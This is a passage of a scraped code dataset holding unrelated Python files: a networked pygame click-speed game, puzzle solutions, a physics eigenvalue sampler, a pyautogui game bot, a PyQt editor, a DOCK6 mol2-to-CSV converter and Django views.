pygame,sys,socket,random,time,math,datetime\nimport connection\nfrom tkinter import *\nfrom tkinter import ttk\nfrom pygame.locals import *\n\nMY_SERVER_HOST = '192.168.0.3'\nMY_SERVER_PORT = 8888\nOTHER_HOST = '192.168.0.2'\nOTHER_PORT = 9999\n\nFPS = 60\n\nclass Option: # menu entry\n    \n    hovered = False\n    \n    def __init__(self, text, pos):\n        self.text = text\n        self.pos = pos\n        self.set_rect()\n        self.draw()\n    \n    def draw(self):\n        self.set_rend()\n        screen.blit(self.rend, self.rect)\n    \n    def set_rend(self):\n        self.rend = menu_font.render(self.text, True, self.get_color())\n    \n    def get_color(self):\n        if self.hovered:\n            return (255, 255, 255)\n        else:\n            return (100, 100, 100)\n    \n    def set_rect(self):\n        self.set_rend()\n        self.rect = self.rend.get_rect()\n        self.rect.topleft = self.pos\n\nclass Player():\n    def __init__(self, pos, count, name):\n        self.img = pygame.surface.Surface((50, 50))\n        self.rect = self.img.get_rect(center = pos)\n        self.count = count # number of clicks so far\n        self.name = name\n\n    def click(self, dir):\n        if dir == 'count':\n            self.count += 1\n    \n    def draw(self):\n        screen.blit(self.img, self.rect)\n    \n    def make_data_package(self):\n        count = str(self.count).rjust(4, '0')\n        name = str(self.name)\n        return count + name\n\n\nclass Player_1(Player):\n    def __init__(self, pos=(960, 360)):\n        super().__init__(pos, 0, '')\n        self.img.fill((255,0,0))\n        text = menu_font.render(str(self.count),True,(255,255,255))\n        screen.blit(text,self.rect)\n\nclass Player_2(Player):\n    def __init__(self, pos=(320, 360)):\n        super().__init__(pos, 0, '')\n        self.img.fill((0,0,255))\n        text = menu_font.render(str(self.count),True,(255,255,255))\n        screen.blit(text,self.rect)\n\ndef ip_value(ip):\n    \"\"\" ip_value returns ip-string as integer \"\"\"\n    return int(''.join([x.rjust(3, '0') for x in ip.split('.')]))\n\n\ndef define_players():\n    if ip_value(MY_SERVER_HOST) > ip_value(OTHER_HOST):\n        me = Player_1()\n        enemy = Player_2()\n    else:\n        me = Player_2()\n        enemy = Player_1()\n    return me, enemy\n\n\ndef data_transfer():\n    me_data = me.make_data_package()\n    connection.send(me_data, OTHER_HOST, OTHER_PORT) # the send code\n\n    enemy_data = server.receive() # the receive code\n    \n    enemy.count = int(enemy_data[:4])\n    enemy.name = enemy_data[4:]\n\n\ndef update_screen():\n    screen.fill((255,255,255))\n    enemy.draw()\n    me.draw()\n    \n    pygame.time.wait(50)\n\n
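Editor's note: make_data_package above serializes a player as a fixed-width packet -- a 4-digit zero-padded click count followed by the name -- and data_transfer parses it back. A hedged round-trip sketch of that format; the sample values are made up:

packet = str(37).rjust(4, '0') + 'alice'
assert packet == '0037alice'
count, name = int(packet[:4]), packet[4:]
assert (count, name) == (37, 'alice')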
pygame.init()\npygame.mixer.quit()\n\nscreen = pygame.display.set_mode((1280, 720)) # window size\nmenu_font = pygame.font.Font('msjh.ttc', 40) # font\n\nGame_title = menu_font.render('Hand Speed Game', True, (255, 255, 255))\noptions = [Option(\"Start\", (600, 200)), Option(\"Leaderboard\", (580, 250)), Option(\"Quit\", (600, 300))]\n\nwin_text = menu_font.render('WIN!',True,(0,0,0))\n\nme, enemy = define_players()\nserver = connection.Server(MY_SERVER_HOST, MY_SERVER_PORT)\n\nPlaying = False\nMovie_stop = False\nGAME_OVER = False\n\nclock = pygame.time.Clock()\n\nmovie = pygame.movie.Movie('second.mpg')\nmovie_screen = pygame.Surface(movie.get_size()).convert()\nmovie.set_display(movie_screen)\n\ntimer = [0.0]\ndt = 1.0\n\ncost_second = [0.0]\n\nwhile GAME_OVER == False:\n    clock.tick(FPS)\n    \n    for event in pygame.event.get():\n        if event.type == pygame.QUIT: # window X pressed\n            pygame.quit()\n            sys.exit()\n    \n    screen.fill((0, 0, 0)) # black background\n\n    screen.blit(Game_title,(545,100))\n\n    for option in options:\n        if option.rect.collidepoint(pygame.mouse.get_pos()): # highlight the option under the mouse\n            option.hovered = True\n        else:\n            option.hovered = False\n        option.draw() # draw the menu entries\n\n\n    if event.type == pygame.MOUSEBUTTONDOWN: # menu click\n        if options[0].rect.collidepoint(pygame.mouse.get_pos()): # \"Start\" pressed\n\n            root=Tk() #GUI\n            root.title(\"Name\")\n            root.geometry(\"320x240\")\n            label=Label(root, text=\"Please enter your name:\")\n            entry=Entry(root)\n\n            def get_name():\n                me.name = entry.get()\n                root.destroy()\n            \n            label.pack()\n            entry.pack()\n            button=Button(root, text=\"OK\", command=get_name).pack()\n            \n            root.mainloop()\n            \n            Playing = True\n        \n        if options[2].rect.collidepoint(pygame.mouse.get_pos()): # \"Quit\" pressed\n            pygame.quit()\n            sys.exit()\n    \n\n\n    if Playing == True:\n        \n        data_transfer()\n        update_screen()\n        \n        pygame.draw.rect(screen,(0,0,0),(640,0,5,450),0) # center divider line\n\n        me_name = menu_font.render(str(me.name),True,(0,0,0)) # my name and the opponent's name\n        enemy_name = menu_font.render(str(enemy.name),True,(0,0,0))\n\n        me_count = menu_font.render(str(me.count),True,(255,255,255)) # my click count and the opponent's\n        enemy_count = menu_font.render(str(enemy.count),True,(255,255,255))\n        \n        screen.blit(me_count,me.rect)\n        screen.blit(enemy_count,enemy.rect)\n        \n        screen.blit(me_name,(me.rect.x,me.rect.y - 50))\n        screen.blit(enemy_name,(enemy.rect.x,enemy.rect.y - 50))\n\n        movie.play()\n        screen.blit(movie_screen,(428,180))\n\n\n        if not(movie.get_busy()): # the movie finished playing\n            Movie_stop = True\n        \n        if Movie_stop == True:\n            \n            if me.count < 99 and enemy.count < 99:\n                timer[0] += dt # tick the timer\n            elif me.count == 99 or enemy.count == 99: # someone reached 99 clicks: stop timing\n                \n                if me.count == 99: # I reached 99 first\n                    screen.blit(win_text,(me.rect.x,me.rect.y-100))\n                    \n                    for event in pygame.event.get():\n                        if event.type == pygame.QUIT:\n                            \n                            pygame.quit()\n                            sys.exit()\n                \n                elif enemy.count == 99: # the opponent reached 99 first\n                    screen.blit(win_text,(enemy.rect.x,enemy.rect.y-100))\n\n                    for event in pygame.event.get():\n                        if event.type == pygame.QUIT:\n                            \n                            pygame.quit()\n                            sys.exit()\n            \n            \n            \n            time_string = str(datetime.timedelta(seconds=int(timer[0])))\n            time_blit = menu_font.render(time_string,True,(0,0,0))\n            time_blit_size = time_blit.get_size()\n            screen.blit(time_blit,(575,500)) # draw the elapsed time\n            \n            pygame.draw.rect(screen,(255,255,255),(428,180,426,240),0) # cover the movie area once playback ends\n            pygame.draw.rect(screen,(0,0,0),(640,0,5,450),0)\n        \n        \n        for event in pygame.event.get():\n            if event.type == MOUSEBUTTONDOWN: # clicked on my own block\n                x,y = pygame.mouse.get_pos()\n                if(x > me.rect.x and x < me.rect.x + 50 and y > me.rect.y and y < me.rect.y + 50 and me.count < 99 and enemy.count != 99): # count is capped at 99\n                    me.click('count')\n            \n            if event.type == pygame.QUIT: # window X pressed\n                pygame.quit()\n                sys.exit()\n    \n    \n    pygame.display.flip()\n    \n\n\n    \n","sub_path":"20190109Player2.py","file_name":"20190109Player2.py","file_ext":"py","file_size_in_byte":7818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56468882","text":"#!/usr/bin/python3\n\nimport sys\nimport string\n\n\ndef distinct_questions(list_of_responses):\n    questions = set()\n    for response in list_of_responses:\n        for question in response:\n            questions.add(question)\n    return len(questions)\n\n\ndef same_questions(list_of_responses):\n    questions_common = set(string.ascii_lowercase)\n    for response in list_of_responses:\n        questions_per_answer = set()\n        for question in response:\n            questions_per_answer.add(question)\n        questions_common = questions_common.intersection(questions_per_answer)\n    return len(questions_common)\n\n\nif __name__ == '__main__':\n    filename = sys.argv[1]\n    file = open(filename, 'r')\n    question_answered = list()\n    sum = 0\n    sum2 = 0\n    for line in file:\n        if len(line.strip()) == 0:\n            if len(question_answered) > 0:\n                sum += distinct_questions(question_answered)\n                sum2 += same_questions(question_answered)\n                question_answered 
= list()\n else:\n question_answered.append(line.strip())\n\n if len(question_answered) > 0:\n sum += distinct_questions(question_answered)\n sum2 += same_questions(question_answered)\n print(\"question_answered:\", sum)\n print(\"same questions:\", sum2)\n\n","sub_path":"src/questions_day6.py","file_name":"questions_day6.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"338829947","text":"import math\r\nimport cmath\r\nimport numpy as np\r\nfrom numpy import linalg as LA\r\nfrom Aux_0 import *\r\nfrom Aux_tile import BuiltTile\r\n\r\nval1 = 0#0 #assign potential value to letter 'a'\r\nval2 = 6*math.sqrt(2)#9 #assign potential value to letter 'b'\r\nval3 = 10*math.sqrt(3)#19 #assign potential value to letter 'c'\r\nval4 = 9*math.pi#29 #assign potential value to letter 'd'\r\n\r\ndef SubDiag(lett): #assign diagonal values to OpMat based on the tiling\r\n return{\r\n 0 : val1,\r\n 1 : val2,\r\n 2 : val3,\r\n 3 : val4\r\n }.get(lett, 0)\r\n\r\ndef Op_Mat_NoPhase(num, patch): #Generates the Schroedinger operator into a square matrix\r\n wid= 2**(num) #wid denotes width of periodic patch\r\n size= wid**2 #size generates the dimension of the operator matrix\r\n NewMat = [[0 for j in range(size)] for i in range(size)]\r\n for i in range(wid):\r\n for j in range(wid):\r\n if i != wid-1:\r\n NewMat[i*wid+j][(i+1)*wid+j] = 1\r\n if j != wid-1:\r\n NewMat[i*wid+j][i*wid+j+1] = 1\r\n if j != 0:\r\n NewMat[i*wid+j][i*wid+j-1] = 1\r\n if i != 0:\r\n NewMat[i*wid+j][(i-1)*wid+j] = 1\r\n NewMat[i * wid + j][i* wid + j] = SubDiag(patch[i][j])\r\n return NewMat\r\n\r\ndef Op_Mat_Phase(num, phase): #Generates the Schroedinger operator into a square matrix\r\n wid= 2**(num) #wid denotes width of periodic patch\r\n size= wid**2 #size generates the dimension of the operator matrix\r\n NewMat = [[0 for j in range(size)] for i in range(size)]\r\n for j in range(wid):\r\n NewMat[0*wid+j][wid*(wid-1)+j] = cmath.exp( phase[1] )\r\n NewMat[(wid-1)*wid+j][0*wid+j] = cmath.exp(- phase[1])\r\n for i in range(wid):\r\n NewMat[i*wid+0][i*wid+ wid-1] = cmath.exp(- phase[0])\r\n NewMat[i*wid+ wid-1][i*wid+0] = cmath.exp( phase[0])\r\n return NewMat\r\n\r\ndef sample_numth_eig_new(itera, res, num, start_tile): # iter is the iteration number,\\\r\n # res is the sampling resolution, num is the eigenvlaue number\r\n x = np.linspace(-cmath.pi, cmath.pi, res+1 )\r\n y = np.linspace(-cmath.pi, cmath.pi, res+1 )\r\n size = 2**(2*itera)\r\n if num>size or num<0:\r\n print('num value is incorrect')\r\n return\r\n if num > 0:\r\n eig_mat = [[0 for a in range(res+1)] for b in range(res+1) ]\r\n elif num == 0:\r\n eig_mat = [[0.0 for a in range(size) ] for s in range(2)]\r\n #[ [[0 for a in range(res+1)] for b in range(res+1) ] for j in range(size) ]\r\n Tile = BuiltTile(itera,start_tile)\r\n mat1 = np.array(Op_Mat_NoPhase(itera, Tile))\r\n for k in range(res+1):\r\n for l in range(res+1):\r\n mat2 = np.array( Op_Mat_Phase(itera,phase(x[k],y[l])) )\r\n mat = np.add(mat1, mat2)\r\n vect=LA.eigvalsh( mat )\r\n if num != 0:\r\n eig_mat[k][l] = vect[num - 1]\r\n elif num == 0:\r\n for j in range(size):\r\n if k==0 and l==0:\r\n eig_mat[0][j] = vect[j]\r\n eig_mat[1][j] = vect[j]\r\n else:\r\n eig_mat[0][j] = max(vect[j] , eig_mat[0][j] )\r\n eig_mat[1][j] = min(vect[j], eig_mat[1][j])\r\n print(\"(\"+str(x[k])+\",\"+str(y[l])+\")\"+\" computed\")\r\n return 
eig_mat","sub_path":"Aux_matrix.py","file_name":"Aux_matrix.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"179033615","text":"import pyautogui\nimport time\nimport re\nimport sys\nimport os\n\n\nclass Dailies:\n # Variables\n rotationsAfterBoss = 0\n\n # Initializing Object\n def __init__(self, bot):\n self.zone = \"123\"\n self.game_bot = bot\n\n self.battle_screen = bot.data[\"battle\"]\n self.town_screen = bot.data[\"town\"]\n self.campaign_screen = bot.data[\"campaign\"]\n self.coordinates = bot.data[\"campaign\"][\"icons\"]\n\n def moveDailyMenuLeft(self):\n pyautogui.click(100, 400)\n pyautogui.dragTo(1800, 400, 0.5, button='left')\n pyautogui.click(100, 400)\n pyautogui.dragTo(1800, 400, 0.5, button='left')\n time.sleep(1)\n\n def moveDailyMenuRight(self):\n pyautogui.click(1800, 400)\n pyautogui.dragTo(100, 400, 0.5, button='left')\n pyautogui.click(1800, 400)\n pyautogui.dragTo(100, 400, 0.5, button='left')\n time.sleep(1)\n\n def processDailyMissions(self):\n self.game_bot.db.refreshData()\n self.server = self.game_bot.db.getServerString()\n self.dailies_data = self.game_bot.db.data[self.server][\"campaign_progress\"][\"dailies\"]\n game_bot = self.game_bot\n\n self.enterDailyLiberationZone()\n self.finishLiberationDailies()\n self.game_bot.db.saveDataFile()\n\n self.exitDailyLiberation()\n self.exitDailyMenu()\n self.returnToBattleScreen()\n\n def enterDailyLiberationZone(self):\n self.game_bot.click(self.coordinates[\"campaign_daily_start\"])\n self.game_bot.click(self.coordinates[\"campaign_daily_liberation_open\"])\n self.moveDailyMenuLeft()\n\n def finishLiberationDailies(self):\n missions = self.coordinates[\"daily_missions\"][\"mission_set_1\"]\n liberation_has_completed = self.dailies_data[\"liberation\"]\n server = self.server\n wait_time = self.game_bot.db.data[self.server][\"campaign_progress\"][\"daily_wait_time\"]\n\n for mission in missions:\n if not liberation_has_completed[mission] and liberation_has_completed[mission] != \"locked\":\n self.game_bot.click(missions[mission])\n self.game_bot.db.data[server][\"campaign_progress\"][\"dailies\"][\"liberation\"][mission] = True\n self.game_bot.db.saveDataFile()\n time.sleep(wait_time)\n self.game_bot.click(self.coordinates[\"battle_ok\"])\n time.sleep(2)\n\n self.moveDailyMenuRight()\n\n def exitDailyLiberation(self):\n self.game_bot.click(self.coordinates[\"daily_liberation_x_icon\"])\n\n def exitDailyMenu(self):\n self.game_bot.click(self.coordinates[\"daily_main_x_icon\"])\n\n def returnToBattleScreen(self):\n self.game_bot.click(self.coordinates[\"x_icon\"])\n self.game_bot.click(self.coordinates[\"x_icon\"])\n","sub_path":"Firestone V2/actors/campaign/Dailies.py","file_name":"Dailies.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"294158459","text":"# coding:utf-8\n\ndef solve():\n s, t = map(str, input().split())\n s1 = s\n for i in range(len(s)):\n if str(s[i]) not in t:\n s1 = s1.replace(s[i], '')\n if t in s1:\n print('YES')\n return\n print('NO')\n return\n\n\ndef main():\n Q = int(input())\n for i in range(Q):\n solve()\n\n\nmain()\n","sub_path":"library_python/AtCoder_Event/THNKS2015/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"221571354","text":"import logging\nfrom PyQt5 import 
QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\n\n\nclass CentralPanelCw(QtWidgets.QWidget):\n # noinspection PyArgumentList,PyUnresolvedReferences\n def __init__(self):\n super().__init__()\n\n self.saved_text_str = (\n\"\"\"\nHow does this contribute to my well-being?\nHow does this contribute to the well-being of others?\nJoyful about this activity\nDifficult about this activity\nBoost for getting started with this activity\nExamples: Sugar\nSupport during this activity\n\nExamples: Music, snacks\nSharing this activity with others\n\n
\n\nsaved text Text in another color (for ingrained habits) back to black!\nMore text here, we can add templates with headers and so on.\n\"\"\"\n )\n\n vbox_l2 = QtWidgets.QVBoxLayout()\n self.setLayout(vbox_l2)\n\n self.habit_qte = QtWidgets.QTextEdit()\n #self.habit_qte.setReadOnly(True)\n self.habit_qte.zoomIn(3)\n #self.habit_qte.copyAvailable.connect(self.on_habit_copy_available)\n vbox_l2.addWidget(self.habit_qte, stretch=5)\n\n self.update_gui()\n\n def on_habit_copy_available(self, i_available:bool):\n if i_available:\n self.habit_qte.copy()\n self.diary_entry_qpte.paste()\n\n def on_edit_rich_text_clicked(self):\n self.input_text_editor = InputTextEditorDialog(self.saved_text_str)\n self.input_text_editor.finished.connect(self.on_input_text_editor_finished)\n self.input_text_editor.show()\n \"\"\"\n result_tuple = QtWidgets.QInputDialog.getMultiLineText(\n self,\n \"title\",\n \"label\",\n self.saved_text_str\n )\n # http://doc.qt.io/qt-5/qinputdialog.html#getMultiLineText\n\n if result_tuple[1] == True:\n self.saved_text_str = result_tuple[0]\n self.habit_qte.setHtml(self.saved_text_str)\n \"\"\"\n\n def on_input_text_editor_finished(self, i_result: int):\n if i_result == QtWidgets.QDialog.Accepted:\n self.saved_text_str = self.input_text_editor.plain_text_edit_qpte.toPlainText()\n self.update_gui()\n\n def update_gui(self):\n self.habit_qte.setHtml(self.saved_text_str)\n\n\nclass InputTextEditorDialog(QtWidgets.QDialog):\n def __init__(self, i_start_text:str, i_parent=None):\n super(InputTextEditorDialog, self).__init__(i_parent)\n\n self.setModal(True)\n\n vbox_l2 = QtWidgets.QVBoxLayout()\n self.setLayout(vbox_l2)\n\n hbox_button_row_l3 = QtWidgets.QHBoxLayout()\n vbox_l2.addLayout(hbox_button_row_l3)\n\n self.ingrained_qpb = QtWidgets.QPushButton(\"Ingrained\")\n self.ingrained_qpb.clicked.connect(self.on_ingrained_clicked)\n hbox_button_row_l3.addWidget(self.ingrained_qpb)\n\n self.header_qpb = QtWidgets.QComboBox()\n self.header_qpb.addItems([\"h1\", \"h2\", \"h3\", \"h4\", \"h5\", \"h6\"])\n self.header_qpb.activated.connect(self.on_header_activated)\n hbox_button_row_l3.addWidget(self.header_qpb)\n\n self.plain_text_edit_qpte = QtWidgets.QPlainTextEdit()\n self.plain_text_edit_qpte.setPlainText(i_start_text)\n vbox_l2.addWidget(self.plain_text_edit_qpte)\n\n self.button_box = QtWidgets.QDialogButtonBox(\n QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel,\n QtCore.Qt.Horizontal,\n self\n )\n vbox_l2.addWidget(self.button_box)\n self.button_box.accepted.connect(self.accept)\n self.button_box.rejected.connect(self.reject)\n\n def on_header_activated(self, i_index: int):\n self.plain_text_edit_qpte.cut()\n self.plain_text_edit_qpte.insertPlainText(\"\")\n self.plain_text_edit_qpte.paste()\n self.plain_text_edit_qpte.insertPlainText(\"\")\n\n def on_ingrained_clicked(self):\n self.plain_text_edit_qpte.cut()\n self.plain_text_edit_qpte.insertPlainText('')\n self.plain_text_edit_qpte.paste()\n self.plain_text_edit_qpte.insertPlainText('')\n\n # get marked/selected text\n # adding ___________\n","sub_path":"wbn/habits/central_panel.py","file_name":"central_panel.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159875211","text":"import deltasigma\nimport numpy as np\n\nclass ExtractRidgePoint:\n def __init__(self):\n self.THRESHOLD = 0.5\n self.none_zero_index = list()\n\n # remove isolated points\n self.iterations = 3\n self.DIM_MAX = 5\n self.DIM_MIN = 2\n\n 
self.point_x = list()\n self.point_y = list()\n\n def execute_ridge_point_extraction(self, fx, fy, frangied_img):\n Fx_1 = deltasigma.circshift(fx, [0, -1]) # fx in -X direction\n print(\"sdsd\", Fx_1)\n\n Fy_1 = deltasigma.circshift(fy, [0, -1]) # fy in -X direction\n Fx_2 = deltasigma.circshift(fx, [0, 1]) # fx in +X direction\n Fy_2 = deltasigma.circshift(fy, [0, 1]) # fy in +X direction\n Fx_3 = deltasigma.circshift(fx, [-1, 0]) # fx in -Y direction\n Fy_3 = deltasigma.circshift(fy, [-1, 0]) # fy in -Y direction\n Fx_4 = deltasigma.circshift(fx, [1, 0]) # fx in +Y direction\n Fy_4 = deltasigma.circshift(fy, [1, 0]) # fy in +Y direction\n\n Ta = 0.\n Fx_ridge = np.dot((fx > 0),\n ((np.dot(fx, Fx_1) + np.dot(fy, Fy_1) < Ta).any() and (np.dot(fx, Fx_2) + np.dot(fy, Fy_2) > Ta).any()))\n Fy_ridge = np.dot((fy > 0).all(),\n ((np.dot(fx, Fx_3) + np.dot(fy, Fy_3) < Ta).any() and (np.dot(fx, Fx_4) + np.dot(fy, Fy_4) > Ta).any()))\n\n\n # Truncate the boundary output\n a, b = frangied_img.shape\n m1 = 2\n m2 = 2\n MaskRidgePoint = np.ones([a, b])\n MaskRidgePoint[1:m1, :] = 0\n MaskRidgePoint[a - m1 + 1: a, :] = 0\n MaskRidgePoint[:, 1: m2] = 0\n MaskRidgePoint[:, b - m2 + 1: b] = 0\n\n RidgePointINDs = np.where((Fx_ridge.any() or Fy_ridge.any()) and MaskRidgePoint.any() > 0)\n px, py = self.ind2sub([a, b], np.array(RidgePointINDs))\n result = []\n for i in range(len(px)):\n result.append((px[i], py[i]))\n print(result)\n return result\n\n def ind2sub(self, array_shape, ind):\n ind[ind < 0] = -1\n ind[ind >= array_shape[0] * array_shape[1]] = -1\n rows = (ind.astype('int') / array_shape[1])\n cols = ind % array_shape[1]\n return rows, cols\n\n","sub_path":"src/MSAProcessingUnit/ExtractRidgePoint.py","file_name":"ExtractRidgePoint.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"616371322","text":"#Script Name: make_csv_tables_from_mol2.py\n#Script Purpose: creates CSV tables containing all the header information in DOCK6's multimolecule mol2 outputs.\n# It also creates a DAT file containing the line numbers defining where each molecule starts and ends.\n#Author Name: Guilherme D. R. Matos\n#Affiliation: Rizzo Lab, Stony Brook University\n#Create date: 08/20/2020\n#Last edit: 06/07/2021 Guilherme D. R. 
Matos/SBU\n\nimport os\nimport sys\nimport pandas as pd\nfrom copy import deepcopy\n\n\n#####################\n# Utility Functions #\n#####################\n\ndef discover_beginning(end):\n # If you know where a molecule ends, you know when the next begin\n begin = [0] # Assume the first molecule begins at idx=0\n for idx in end:\n begin.append(idx + 1)\n # After loop is done, remove last element of list\n del begin[-1]\n return begin\n\n\ndef discover_ends(filename, end_pattern):\n data = open(filename, 'r+')\n lines = data.readlines()\n \n # Loop over all lines and find pattern\n end = []\n for idx, line in enumerate(lines):\n if end_pattern in line:\n end.append(idx)\n else: continue\n \n # Use 'discover_beginning' function to find \n # indices where molecules begin.\n begin = discover_beginning(end)\n \n return begin, end\n\n\ndef create_dataframe_from_mol2(filename, descriptor_list):\n data = open(filename, 'r+')\n lines = data.readlines()\n \n # Create empty dataframe\n df = pd.DataFrame()\n \n # Loop over descriptor list and lines of the mol2 file to\n # collect the data.\n for entry in descriptor_list:\n tmp = []\n for line in lines:\n if entry in line:\n broken_line = line.split()\n # Append the data of interest\n tmp.append(broken_line[2])\n else: continue\n df[entry] = tmp\n \n return df\n\n\n##############\n# Main #\n##############\n\n# Exit if not Python 3.X\nif sys.version_info[:1] < (3,):\n sys.exit(\"This is a Python 3 script. Python 2.7 is deprecated and should not be used.\")\n\n# Check if input was properly given\nif len(sys.argv) != 2:\n print(\"You should use the script in the following way:\")\n print(f\"{sys.argv[0]} multimol_mol2file\")\n sys.exit()\n\n# Assign user input to variable\nmol2file = sys.argv[1]\n\n# Important variables\nend_pattern = '0 ROOT'\ndescriptors = [\"Name_DOCK\",\"From_List\",\"List_Rank\",\"Name_MOE\",\"Cluster_size\",\n \"TotalScore_(FPS+DCE)\",\"Continuous_Score\",\"Continuous_vdw_energy\",\n \"Internal_energy_repulsive\",\"Footprint_Similarity_Score\",\n \"FPS_vdw_fps\",\"FPS_es_fps\",\"FPS_hb_fps\",\"FPS_vdw_fp_numres\",\n \"FPS_es_fp_numres\",\"FPS_hb_fp_numres\",\"Num_H-bonds\",\"DOCK_rot_bonds\",\n \"Pharmacophore_Score\",\"Property_Volume_Score\",\"Tanimoto_Score\",\n \"Hungarian_Matching_Similarity_Score\",\"Descriptor_Score\",\n \"MOE_rot_bonds\",\"Molecular_weight\",\"Num_chiral_centers\",\n \"Lipinski_donors\",\"Lipinski_acceptors\",\"Lipinski_druglike\",\n \"Lipinski_violations\",\"SlogP\",\"Formal_charge\",\"logS\",\n \"Ligand_efficiency\",\"SMILES\"]\n\n# Create dataframe from mol2 file\ndata = create_dataframe_from_mol2( mol2file, descriptors )\n\n# Save csv file\ncsvname = mol2file[:-5] # remove \".mol2\" from the end\ndata.to_csv(f\"{csvname}.csv\", index=False)\n\n# Separate ZINC IDs to facilitate the retrieval of specific molecules from \n# the mol2 file. 
Write to file.\nzinc_ids = deepcopy( data[\"Name_DOCK\"] )\nbegin, end = discover_ends( mol2file, end_pattern )\nif (len(zinc_ids) == len(begin)) and (len(zinc_ids) == len(end)):\n with open(f\"positions_{csvname}.dat\", \"w+\") as f:\n f.write(\"Name\\tbegin_idx\\tend_idx\\n\")\n for i in range(len(zinc_ids)):\n f.write(f\"{zinc_ids[i]}\\t{begin[i]:6}\\t{end[i]:6}\\n\")\nelse:\n print(\"There is something wrong in the mol2 file\")\n\n\n\n\n","sub_path":"utilities/DOCK/data_compilation/make_csv_tables_from_mol2.py","file_name":"make_csv_tables_from_mol2.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"39443801","text":"from core.mixins import PageTitleMixin\nfrom django.views.generic import TemplateView\nfrom league.models import Season, Team\nfrom season.models import Game, StandingReport\n\n\nclass ScheduleView(PageTitleMixin, TemplateView):\n season = None\n team = None\n title = 'Season Schedule'\n template_name = 'season/schedule.html'\n\n def get_context_data(self, **kwargs):\n kwargs = super(ScheduleView, self).get_context_data()\n kwargs['schedule'] = self.get_schedule()\n kwargs['teams'] = self.get_teams_in_season()\n kwargs['season'] = self.season\n return kwargs\n\n def get_season(self):\n season_id = self.kwargs.get('season')\n try:\n self.season = Season.objects.get(id=season_id)\n except Season.DoesNotExist:\n # If season isn't specified get the current published season.\n self.season = Season.objects.filter(published=True).order_by('-start').first()\n\n def get_team(self):\n team_id = self.kwargs.get('team')\n try:\n self.team = Team.objects.get(id=team_id)\n except Team.DoesNotExist:\n pass\n\n def get_teams_in_season(self):\n teams = self.season.teams.all()\n return teams\n\n def get_schedule(self):\n self.get_season()\n self.get_team()\n\n schedule = Game.objects.filter(season=self.season)\n schedule = schedule.prefetch_related('field', 'home_team', 'away_team')\n schedule = schedule.order_by('start', )\n\n if self.team:\n home_games = schedule.filter(home_team=self.team)\n away_games = schedule.filter(away_team=self.team)\n schedule = home_games | away_games\n\n return schedule\n\n\nclass StandingsView(PageTitleMixin, TemplateView):\n season = None\n title = 'Season Standings'\n template_name = 'season/standings.html'\n\n def get_context_data(self, **kwargs):\n kwargs = super(StandingsView, self).get_context_data()\n kwargs['standings'] = self.get_standings()\n kwargs['season'] = self.season\n return kwargs\n\n def get_season(self):\n season_id = self.kwargs.get('season')\n try:\n self.season = Season.objects.get(id=season_id)\n except Season.DoesNotExist:\n # If season isn't specified get the current published season.\n self.season = Season.objects.filter(published=True).order_by('-start').first()\n\n def get_standings(self):\n self.get_season()\n\n standings = StandingReport.objects.filter(season=self.season)\n standings = standings.order_by('-wins', '-points', '-plus_minus')\n\n return standings","sub_path":"src/season/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"466613769","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'account'\n\nurlpatterns = [\n path('profile/', views.profile_view, name='profile'),\n path('profile/edit/', views.edit_profile, name='edit_profile'),\n path('logout/', views.logout, name='logout'),\n path('list/', views.user_list, name='user_list'),\n path('myworks/', views.all_user_works, name='all_user_works'),\n path('delete/()/', views.art_delete, name='art_delete'),\n]\n","sub_path":"umetnine/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"95964941","text":"from django.http import Http404\nfrom django.shortcuts import render\nfrom kiwi.models import HealthReport\nfrom datetime import datetime, timedelta\nfrom django.db.models import Count, Subquery\nfrom django.db.models.functions import TruncDate\n\n\ndef report1(request):\n\tif request.POST:\n\t\trequested_date = datetime.strptime(request.POST.get(\"date\"), '%d.%m.%Y')\n\t\tlast_week = requested_date - timedelta(days = 7)\n\n\n\t\tdata_this_week = HealthReport.objects.filter(\n\t\t\t\ttimestamp__year = requested_date.year,\n\t\t\t\ttimestamp__month = requested_date.month,\n\t\t\t\ttimestamp__day = requested_date.day\n\t\t\t).values(\"device_id\", \"device_type\", \"device_status\").annotate(cnt = Count(\"device_id\", distinct = False)).order_by(\"-cnt\", \"device_id\")[:10]\n\n\n\t\tdata = []\n\n\t\tfor d in data_this_week:\n\t\t\tdata_last_week = HealthReport.objects.filter(\n\t\t\t\t\ttimestamp__year = last_week.year,\n\t\t\t\t\ttimestamp__month = last_week.month,\n\t\t\t\t\ttimestamp__day = last_week.day\n\t\t\t\t).filter(device_id = d[\"device_id\"]).values(\"device_id\", \"device_type\", \"device_status\").annotate(cnt = Count(\"device_id\", distinct = False))\n\t\t\t\n\t\t\tdata.append({\"device_id\": d[\"device_id\"], \"device_type\": d[\"device_type\"], \"cnt\": d[\"cnt\"], \"percent\": 100 * d[\"cnt\"] / (data_last_week[0][\"cnt\"] + d[\"cnt\"])})\n\n\telse:\n\t\trequested_date = datetime.now()\n\t\tdata = []\n\n\treturn render(request, 'report1.html', {\"day\": datetime.strftime(requested_date, '%d.%m.%Y'), \"data\": 